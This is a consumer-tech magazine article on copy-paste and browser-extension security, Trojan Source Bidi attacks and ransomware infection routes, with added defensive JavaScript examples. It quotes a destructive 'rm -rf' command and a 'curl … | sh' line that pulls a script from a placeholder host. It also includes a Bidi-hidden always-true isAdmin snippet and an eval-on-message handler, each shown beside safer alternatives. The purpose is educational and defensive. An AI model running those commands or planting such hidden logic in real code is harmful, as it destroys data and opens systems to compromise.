Maximum PC - USA (2022-03)

© CRXCAVATOR.IO


>> We hope you’re not the sort of person who clicks random links in suspect-looking emails, but at the very least you should hover over them (or copy and paste the link into a text document) to make sure it links to a legitimate domain, and not something using deceptive characters like goog1e.com, or deceptive subdomains like google.domain.cm. Speaking of copying and pasting, be extra careful when doing so with code excerpts. Not only is there the risk that the command itself will do something bad, like rm -rf --no-preserve-root /, but thanks to the wonders of CSS and Unicode it’s easy to inject invisible characters that you won’t see until they’re pasted (and conceivably not even then). Just appending curl ransomware.xyz/pwn.sh | sh is one way to stop a benign command from being so benign (not a real URL, by the way). Bidirectional (Bidi) character encodings have been used to obfuscate the file extensions of email-borne malware in the past.
>> A more insidious form of this attack has now been discovered, dubbed Trojan Source. It turns out that most compilers, while fully supporting and encouraging Unicode source files, don’t really have any mitigations against obfuscated Bidi additions. So a lazy developer might copy and paste a code snippet from Stack Overflow, then not only risk having their own compiler exploited, but if they then upload that code to a popular project, the whole well becomes poisoned.
>> You can read about it in depth at https://krebsonsecurity.com/2021/11/trojan-source-bug-threatens-the-security-of-all-code/ (don’t worry, that link is safe!). The scope of the attack is huge, because it allows essentially arbitrary, invisible code to be added. This might be keyloggers, ransomware, or any number of other bad things.
>> No matter how web-savvy you are, you can always take steps to further your browsing security. No one likes ads, and no one likes that the networks behind them are, on occasion, compromised to instead spew malicious JavaScript. The most popular ad-blocker for Firefox is uBlock Origin, and we wouldn’t hesitate to recommend it. There are several other add-ons you might want to use to protect privacy. But be aware that the Firefox add-ons repository and the Chrome Web Store are not actively monitored for malicious code, so exercise an abundance of caution when downloading new add-ons.
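The invisible-character and Trojan Source problems described above (a pasted command carrying characters you cannot see, a comment that renders in one order and compiles in another) are something a reviewer can detect mechanically rather than by eye. Below is an added example, not code from the article and not from the Trojan Source authors: a scanner that lists the Bidi and zero-width code points in a piece of text and a helper that rewrites them as visible escapes. The table of code points and the sample snippet are constructed for the example.

```javascript
// Added example (not from the article): find the Unicode control characters
// that make pasted text read differently from the way it executes.

// Code points that are invisible or reorder text (names taken from the Unicode
// character names; the selection is constructed for this example).
const SUSPECT = new Map([
  [0x202A, 'LEFT-TO-RIGHT EMBEDDING'], [0x202B, 'RIGHT-TO-LEFT EMBEDDING'],
  [0x202C, 'POP DIRECTIONAL FORMATTING'], [0x202D, 'LEFT-TO-RIGHT OVERRIDE'],
  [0x202E, 'RIGHT-TO-LEFT OVERRIDE'], [0x2066, 'LEFT-TO-RIGHT ISOLATE'],
  [0x2067, 'RIGHT-TO-LEFT ISOLATE'], [0x2068, 'FIRST STRONG ISOLATE'],
  [0x2069, 'POP DIRECTIONAL ISOLATE'], [0x200E, 'LEFT-TO-RIGHT MARK'],
  [0x200F, 'RIGHT-TO-LEFT MARK'], [0x200B, 'ZERO WIDTH SPACE'],
  [0x200C, 'ZERO WIDTH NON-JOINER'], [0x200D, 'ZERO WIDTH JOINER'],
  [0x2060, 'WORD JOINER'], [0xFEFF, 'ZERO WIDTH NO-BREAK SPACE (BOM)'],
]);

// Walk the text by code point (not UTF-16 unit) and record every suspect
// character with its 1-based line and column.
function findInvisible(source) {
  const findings = [];
  let line = 1;
  let column = 1;
  for (const ch of source) {
    const cp = ch.codePointAt(0);
    if (SUSPECT.has(cp)) {
      findings.push({ line, column, codePoint: cp, name: SUSPECT.get(cp) });
    }
    if (ch === '\n') {
      line += 1;
      column = 1;
    } else {
      column += 1;
    }
  }
  return findings;
}

// Rewrite the suspect characters as \u{...} escapes so they become visible
// in a review, leaving everything else untouched.
function reveal(source) {
  return Array.from(source, (ch) => {
    const cp = ch.codePointAt(0);
    return SUSPECT.has(cp) ? `\\u{${cp.toString(16).toUpperCase()}}` : ch;
  }).join('');
}

// Constructed snippet in the Trojan Source style: the Bidi controls inside the
// comment reorder what an editor displays, so the reviewer sees the check while
// the compiler sees a comment that swallows it and an unconditional return.
const SNIPPET =
  'function isAdmin(user) {\n' +
  '  const ok = check(user); /*\u202E } \u2066if (ok) \u2069 \u2066*/ return true;\n' +
  '}\n';

for (const f of findInvisible(SNIPPET)) {
  console.log(`line ${f.line}, column ${f.column}: U+${f.codePoint.toString(16).toUpperCase()} ${f.name}`);
}
console.log(reveal(SNIPPET));
```

Run over a snippet before it is pasted into a terminal or committed, the scanner turns "it looked fine in the browser" into a list of exact positions; the same check applied in a pre-commit hook or CI job is the mitigation the article notes most compilers lack.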
>> Even genuine add-ons contain code that can be exploited by a rogue add-on or a maliciously crafted web page. A study entitled “DoubleX: Statically Detecting Vulnerable Data Flows in Browser Extensions at Scale” found 184 extensions that could be exploited this way. An unchecked ‘eval’ function in a privileged extension might allow a web page to do anything the extension can. A stray tabs.executeScript() call would allow remote code inclusion.
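To make the two extension weaknesses just described concrete (an eval on page-supplied data, and script injection built from a message rather than from a file bundled with the extension), here is an added example, not code from the article or from the DoubleX study. The handlers are written as plain functions so they run under Node; in a real extension they would be registered on browser.runtime.onMessage or onMessageExternal, and the origin allow-list, command table and file names are constructed for illustration.

```javascript
// Added example (not from the article or the DoubleX study): the vulnerable
// data flow beside its hardened form, modelled as plain message handlers.
// `message` is what a web page sent; `sender.url` is the page that sent it.

// Vulnerable: whatever string the page puts in message.code runs with the
// extension's privileges, for any sender.
function vulnerableHandler(message, sender) {
  return eval(message.code); // unchecked eval on page-controlled data
}

// Hardened: only allow-listed origins may talk to the handler, and the message
// selects a command from a fixed table; it never carries code.
const ALLOWED_ORIGINS = new Set(['https://app.example']); // constructed allow-list
const COMMANDS = {
  ping: () => 'pong',
  getVersion: () => '1.0.0',
};

function hardenedHandler(message, sender) {
  let origin;
  try {
    origin = new URL(sender.url).origin;
  } catch (_) {
    return { error: 'bad sender' };
  }
  if (!ALLOWED_ORIGINS.has(origin)) {
    return { error: 'origin not allowed' };
  }
  // hasOwnProperty, not `in`: "constructor" or "__proto__" must not resolve
  // through the prototype chain.
  if (!message || typeof message.command !== 'string' ||
      !Object.prototype.hasOwnProperty.call(COMMANDS, message.command)) {
    return { error: 'unknown command' };
  }
  return { result: COMMANDS[message.command]() };
}

// Same idea for script injection: the details object handed to
// tabs.executeScript should only ever name a file shipped inside the
// extension, chosen from a fixed set, never a `code` string from a message.
const INJECTABLE_FILES = new Set(['highlight.js', 'readability.js']); // constructed

function scriptDetailsFor(message) {
  if (!message || typeof message.inject !== 'string' || !INJECTABLE_FILES.has(message.inject)) {
    return null; // refuse rather than fall back to { code: ... }
  }
  return { file: message.inject };
}

// Benign demonstration input: the point is that the string is evaluated at all.
console.log('vulnerable:', vulnerableHandler({ code: '6 * 7' }, { url: 'https://evil.example/' }));
console.log('hardened  :', hardenedHandler({ command: 'ping' }, { url: 'https://evil.example/' }));
console.log('hardened  :', hardenedHandler({ command: 'ping' }, { url: 'https://app.example/page' }));
console.log('inject    :', scriptDetailsFor({ inject: 'https://evil.example/x.js' }));
```

In a data-flow analysis of the kind DoubleX performs, the vulnerable handler is a direct path from message input to a dangerous sink; the hardened one breaks the path by allowing only an origin check and a table lookup in between. Chrome's default extension content security policy also blocks eval unless the manifest explicitly relaxes it, which is a second line of defence worth keeping.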

>> The Trojan Source attack has a spooky website (https://trojansource.codes) that carries the rather ominous tagline “Some vulnerabilities are invisible”.

>> If you need a second opinion on Chrome extensions, you could do a lot worse than visiting https://crxcavator.io.

HOW TO GET INFECTED

Unfortunately, most ransomware outbreaks start with human error. This might be through social engineering, spear-phishing campaigns (where high-profile individuals are targeted and tricked into handing over data with seemingly legitimate messages), rogue browser add-ons, dodgy websites, dodgy mobile apps, poisoned email attachments; the list goes on.

Sometimes human error upstream is to blame: for example, SIM-swapping attacks might involve tricking a customer service agent into porting a number to another SIM. This might then enable 2FA to be compromised on all the accounts linked to that number. Whatever the method, once a human has erred, access is granted.

The WannaCry outbreak in 2017, which nearly crippled the UK’s largely Windows 7-powered National Health Service, was a little different, since its spread was mostly the result of a vulnerability in the SMB protocol. That vulnerability was actually known to NSA researchers, who named it EternalBlue. Unfortunately, someone (perhaps a rogue contractor) made away with its details, and later, just before WannaCry hit, the vulnerability was published by a group calling themselves the ShadowBrokers.

EternalBlue, which allows privileged code execution on remote systems, was also leveraged in the NotPetya ransomware outbreak, which disrupted global shipping more than the Ever Given blocking the Suez Canal did.
